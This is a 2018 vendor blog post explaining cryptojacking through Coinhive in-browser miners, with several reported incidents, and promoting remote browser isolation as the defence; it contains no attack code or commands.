What’s Mined is Mine

JOE CISO on January 18, 2018 | 1317

Cryptojacking becomes the malware du jour

It seems that everywhere you look these days, everyone is talking about a new, digitally shiny medium, cryptocurrencies. Highly reliable despite the lack of a central issuing authority, cryptocurrencies—Bitcoin, Monero, Ethereum, Litecoin, Ripple, and several others—employ blockchain technology to ensure that every transaction is verified and recorded in a distributed public ledger. New cryptocurrency is created by “mining”, the process of adding transaction records (“blocks”) to the currency’s public ledger of past transactions. Mining is computer resource-intensive, but with special software and enough computer power, miners can create new blocks and earn cryptocurrency.

Mining has become a very big business—in fact, a digital gold rush. Every day, the race toward block-creation begins anew with over half a billion people competing worldwide. The winners make money, the losers don’t.

As you would expect, over time, as more people compete harder for the crypto-gold that is increasing in value, more and more computer horsepower is required to win the race.

When the most successful cryptocurrency, Bitcoin, was in its infancy, you could use your own PC to mine for it and make some money. Today, successful Bitcoin mining requires supercomputer power well beyond what you and I can muster from our PCs and laptops.  Mining newer cryptocoinage can still be undertaken with moderate computer cycles—at least until the new currencies either melt away or become expensive enough to attract their own armies of competing miners—and then, like Bitcoin, they will demand abundant computer horsepower to get into the race.

There’s Gold in Them Thar Digital Hills

Hackers will be hackers and miners are no different. Enterprising miners who want to go after expensive cryptocurrencies have developed methods of harnessing hundreds and even thousands of PCs to work together to accumulate the necessary power and speed to win the next mining race and stake their claim to crypto-gold. By harnessing the accumulated compute power of unsuspecting Internet users, website owners, as well as web hackers, are able to compete for cryptocurrency rewards.

How do they commandeer our computers and how do they get away with it?

Welcome to the wonderful world of cryptojacking. Using readily available JavaScript libraries, today’s digital miners can hijack other devices to do their mining for them, kind of like furnishing drills and pickaxes to the gold-diggers of old. Only these tools are digital, easy to install and very effective. This provides a highly tempting new source of revenue to legitimate website owners, who have seen advertising revenues steadily decrease with the rise of AdBlocker plug-ins, not to mention just plain “banner blindness”.

The leading provider of mining-software libraries, Coinhive, even markets itself to website owners as a way to “run your site without ads”. Website owners are tempted to place Coinhive mining JavaScripts on their websites. When you and I come to visit, we load the web page and the in-browser mining code runs. No need to install it and no need to opt-in. It just grabs computer cycles from our PCs and runs.

Ladies and gentlemen, your computer has just been “cryptojacked” by the website, which is now enjoying your “magnanimous” efforts, along with that of thousands of other site visitors, to help them mine for Bitcoin, Monero, or other cryptocurrency of choice. And you don’t even know it!

Cryptojacking in Motion

This crypto-mining power grab is not always undertaken by website owners. In many cases, cryptojacking is accomplished without their knowledge. We have already heard of several major websites being compromised by hackers, who then surreptitiously planted their cryptojacking scripts. Just last September, we learned that the website of the television network, Showtime, was involved in cryptojacking. The Coinhive scripts appearing on its website were funneling 30% of the mining proceeds to Coinhive itself, while Showtime kept the remainder. There may be thousands of such sites engaging with Coinhive in this manner.

Another enterprising cryptominer used WiFi in a Starbucks in Argentina to farm for Monero coins by exploiting customer logins to the coffee chain's free WiFi (watch). A 10-second delay in the login process was providing a stealthy method for the miner to gain a bit of your computer resource while you sip your coffee.

Even Google’s SafeBrowse Chrome extension—that actually purports to block popup ads and skip ad pages that appear before downloads—was discovered to be secretly running a Coinhive mining script in the background. With some 150,000 users routinely using the extension, SafeBrowse was clandestinely making a goodly income for its entrepreneurial developers by exploiting the CPU power of unaware users.

Only a couple of months ago, a copy of the Coinhive in-browser cryptocurrency miner was found inside one of the JavaScript files used by LiveHelpNow, a live chat and support widget. LiveHelpNow is used by companies globally to provide customer support. No telling how many large-scale enterprises were exploited in this mining exercise with or without the knowledge of the company.

Cryptojacking is flourishing – and is taking over our computer horsepower in the most nefarious of ways.

Putting an End to Cryptojacking

While many users are already fighting back with anti-malware solutions and browser plug-ins, the hackers seem to always be just one step ahead.

Rather than an endless game of catch-up, however, there is a comprehensive solution you can deploy once across your organization to ensure that endpoint devices cannot be exploited in this manner.

Remote Browser Isolation (RBI) leverages virtual browsers that reside in disposable containers outside of the network (usually in the DMZ or the cloud). Unbeknownst to enterprise end users, who might be using anything from Firefox to Chrome, Opera or Edge, to browse the web, the virtual browser renders the webpage far away from the endpoints themselves, and streams it back to users in real-time, for a native, interactive and secure web browsing experience. The user doesn’t notice any performance degradation, while the endpoint is kept free and clear of Coinhive and other such threats. 

Moreover, once the user's browsing session is over or times out, the container in which it runs is simply destroyed, along with any malicious files or processes it may have briefly hosted. So even if a mining hack sneaks in, it’ll have very little time to hog the (relatively limited) processing resources allocated to the container before it, too, is history. 

Cryptojackers will just have to find other ways to mine their digital currencies, but not with our endpoints!

 

Author | 18 Blog Posts

Joe CISO

Joe CISO is the information security professional responsible for protecting the organization from all cyber threats, including ransomware, dirve-by donwnloads and zero-day exploits. | Ericom Software

Recommended Articles